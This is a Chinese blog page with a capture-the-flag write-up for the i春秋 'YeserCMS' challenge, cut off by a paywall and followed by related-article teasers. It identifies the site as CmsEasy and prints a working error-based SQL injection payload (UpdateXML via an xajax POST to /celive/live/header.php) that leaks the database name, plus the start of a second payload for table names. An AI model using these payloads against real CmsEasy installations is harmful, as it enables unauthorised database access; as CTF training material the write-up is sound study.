i春秋python_i春秋CTF-YeserCMS

最新推荐文章于 2021-12-23 20:46:22 发布
最新推荐文章于 2021-12-23 20:46:22 发布
阅读量157 收藏
点赞数
文章标签: i春秋python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29707757/article/details/112936308
版权

分析

打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS

访问url/celive/live/header.php,直接进行报错注入

数据库:

xajax=Postdata&xajaxargs[0]=detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--

# 结果:

XPATH syntax error: '[Yeser]'

INSERT INTO `yesercms_detail` (`chatid`,`detail`,`who_witter`) VALUES('','xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- (2018-09-06 17:06:08)','2')

数据表:

这里需要注意一下:group_concat取数据的32位,因此不能完全爆出数据表,需要调整1,32才行

xajax=Postdata&xajaxargs[0]=detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SE

最低0.47元/天 解锁文章
小小甜饼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
i春秋python_i春秋CTF web题(1)
weixin_40001245的博客
01-14 426
之前边看writeup,边做实验吧的web题,多多少少有些收获。但是知识点都已记不清。所以这次借助i春秋这个平台边做题,就当记笔记一样写写writeup(其实都大部分还是借鉴其他人的writeup)。本人小白一枚,于是从低分题(简单题)边学边做这篇随笔会写4道题0x01:爆破-10x02:爆破-20x03:爆破-30x04:upload0x01:爆破-1 打开链接,发现一段PHP代码 明确我们的f...
YeserCMS
weixin_30371875的博客
07-24 220
这道题直接让我们查网站根目录的flag,我首先想到的是一句话木马,但是奈何找不到上传的接口啊,只好作罢, 在下载发现有个cmseasy的标识,明显是要提示我们这里是easycms,百度easycms的漏洞然后注入 注入点: http://cac6d32bf8ff4b52becb3516148c9c106deeaa1e92b64a8e.changame.ichunqiu.com//celive...
i春秋-百度杯九月场-YeserCMS
qq_44657899的博客
02-23 1383
首先,拿到这种cms的题, 1,要先判断是什么类型的cms 2,搜索这种cms的漏洞。 3,利用该漏洞 一,判断cms: 1,在该站内找找有没有什么标识,这道题的标识在下载处有cmseasy 2,搜索手机版 - 购物车 - 留言 - 繁体 - 注册 / 登陆,可以在网上找到一大堆相同cms的网站。 在下方找到了cms名字: 3,看到这里有详细的信息,百度一下。 二,查找easycms...
“百度杯”CTF比赛 九月场_YeserCMS
a173262565的博客
04-14 206
题目在i春秋ctf大本营 题目的提示并没有什么卵用,打开链接发现其实是easycms,百度可以查到许多通用漏洞 这里我利用的是无限报错注入 访问url/celive/live/header.php,直接进行报错注入 xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(Updat...
i春秋 “百度杯”CTF比赛 九月场 YeserCMS
include_heqile的博客
09-08 1304
https://www.ichunqiu.com/battalion?t=1 首先说明一点,这题怒是我自己做出来的,我参考了很多博主的writeup,但是他们的writeup只是提示我应该去利用什么漏洞: https://www.w00yun.top/bugs/wooyun-2015-0137013.html 虽然知道了是这个漏洞,但是我不会利用,在这上面耗了很长时间,因为我直接把漏洞报...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋杯等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
KWA_Write-UP-CTF_Muhammad-Irsyad-Ali_05311840000041
03-18
Dokumentasi CTF-穆罕默德·伊尔萨德·阿里(Muhammad Irsyad Ali) 问题清单 UTCTF 2021 初学者 完整性检查1.说明您可以在#announcements频道的说明中找到该标志! 2.标志utflag {welcome_to_utctf}![替代文字]...
CTF-python像素画图工具
最新发布
10-06
在网络安全的领域中,CTF(Capture The Flag)竞赛是一种常见的技术挑战,涵盖了密码学、逆向工程、网络攻防等多个方面。其中,图像隐写题目的解决常常需要利用编程技术,尤其是Python语言中的图像处理库——PIL...
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
技术栈python3.6 + Django 2.1.7 + 10.3.9-MariaDB or Mysql-8.0 + REST Framework 3.9.2 + xadmin + Celery + Vue部署基于ubuntu 18 LTS版本安装mysql、redis 并在setting.py中配置连接信息创建虚拟环境基于python...
“百度杯”CTF比赛 九月场--YeserCMS
Oavinci的博客
03-22 545
正在上传…重新上传取消 在文档下载的评论区发现是EASYCMS 正在上传…重新上传取消 百度EASYCMS存在的漏洞,发现存在无限制报错注入,可获取全站信息 漏洞参考:https://www.w00yun.top/bugs/wooyun-2015-0137013.html 访问/celive/live/header.php进行报错注入 爆数据库,得到“Yeser...
i春秋CTF-YeserCMS
苟有恒,必有三更眠,五更起。
09-06 797
分析 打开网站,在文档下载页面用户评论区域,发现是一个EasyCMS 于是百度EasyCMS的漏洞,发现cmseasy 无限制报错注入(可获取全站信息exp) 访问url/celive/live/header.php,直接进行报错注入 数据库: xajax=Postdata&amp;xajaxargs[0]=&lt;xjxquery&gt;&...
“百度杯”CTF比赛 九月场 YeserCMS
weixin_30852451的博客
06-13 227
打开题目 进入后是一个cms,但肯定的是这个cms不叫yesercms 于是我们开始随便翻翻,寻找信息,后台我也看了除了一个登陆界面,就没有其他的提示信息。 最后在文档下载的评论栏里发现,这个cms的真正名称是cmseasy。 上网去查cmseasy的漏洞 然后大致查了下应该是sql注入漏洞 于是构造报错注入测试一下 回显内容,还告诉了我们这个sql语句的完整内容,总...
百度杯”CTF比赛 九月场YeserCMS
sssvvf的博客
10-15 339
百度杯”CTF比赛 九月场YeserCMS 打开网站,看见YESERCMS,查了下好像没有这个CMS,直接CMS指纹识别一下,发现是CMSEASY。 网上找相关GETSHELL漏洞,发现一个伪造IP进入后台的洞,但是PING不通,暂时无法获得准确的IP地址,最后在http://www.hacksec.cn/codesec/378.html博客上发现SQL注入漏洞。 POC: h...
“百度杯”CTF比赛 九月场 YeserCMS 详细解析
drip_big的博客
04-14 794
“百度杯”CTF比赛 九月场 YeserCMS 详细解析 看题解的,对每个关键步骤做出详细注释 题目内容: 新的CMS系统,帮忙测测是否有漏洞。 1 第一步就是了解这是什么cms 百度YeserCMS,没有相关CMS,应该是改了名字。 在网站内找一找,没看到哪里有标志信息,一下几种方式可以辨认 直接用浏览器搜索cms指纹识别 搜索 “手机版 - 购物车 - 留言 - 繁体 - ...
【百度杯】九月场-YeserCMS wp
hijack89的博客
10-16 570
思路 确定CMS类型 查找该CMS出现过的漏洞 利用漏洞拿到shell,get flag 确定CMS类型 从评论处确定是CMSEASY 查找公开漏洞 找到一个注入漏洞cmseasy无限制报错漏洞,得知是一个报错注入,从文中找到poc,经URL解码如下xajax=Postdata&amp;xajaxargs[0]=&lt;xjxquery&gt;&lt;q&gt;detail=xxxxxx',...
“百度杯”CTF比赛 九月场 YeserCMS writeup
yipyuenkay的博客
03-29 294
CMS类型题目一般思路: 第一步,判断出cms类型 第二步,查询该cms曾经出现的漏洞 第三步,然后利用这些漏洞拿到flag. 搜yesercms全是writeup…… 就随便点点,文件下载那里发现应该cmseasy才是其真正的cms 解题过程 Step1 搜索CMSeasy的漏洞 百度CMSeasy存在的漏洞,发现存在无限制报错注入,可获取全站信息 漏洞参考1:https://www....
[WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程
AAAAAAAAAAAA66的博客
12-23 1443
中华人民共和国网络安全法(出版物)_360百科 可以说一道经典的CTF题目,解这道题的过程类似于我们渗透测试的过程,所以把它放在了这个专栏,在这里我们详细讲过程,而不是原理。 目录 题目 寻找方向 flag .php YearsCMS 报错注入 后台读取flag 总结 题目 给了我们提示,而且注意题目名字,YeserCMS CMS(内容管理系统)提示我们要找到这个网站的CMS版本 进入环境 寻找方向 一般情况我们肯定都是把能点的全点一遍,上传的上传...
[百度杯]九月场 YeserCMS writeup
Flyour的博客
04-05 2561
Yesercms 题目里面说这是一个新的cms,让大家测一测有没有漏洞。哼,都是套路。 老规矩: 1. 第一步,肯定是要判断出cms类型 2. 第二步,查询该cms曾经出现的漏洞 3. 第三步,然后利用这些漏洞拿到flag. 第一步:判断cms类型 看一下网站内容,没有明显的标志标明是什么cms。不过当我浏览一遍网站的内容后,发现这个网站真是东拼西凑啊,又是卖电子产品,...
Python速成:CTF 02-day课件,快速入门及环境配置攻略
PythonCTF比赛中是一个非常重要的工具,因为Python的简洁语法和强大功能可以帮助选手快速解决问题。 在CTF中,Python常用于解决各种类型的问题,如逆向工程、漏洞利用、密码学等。通过学习Python的各种用法和技巧...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值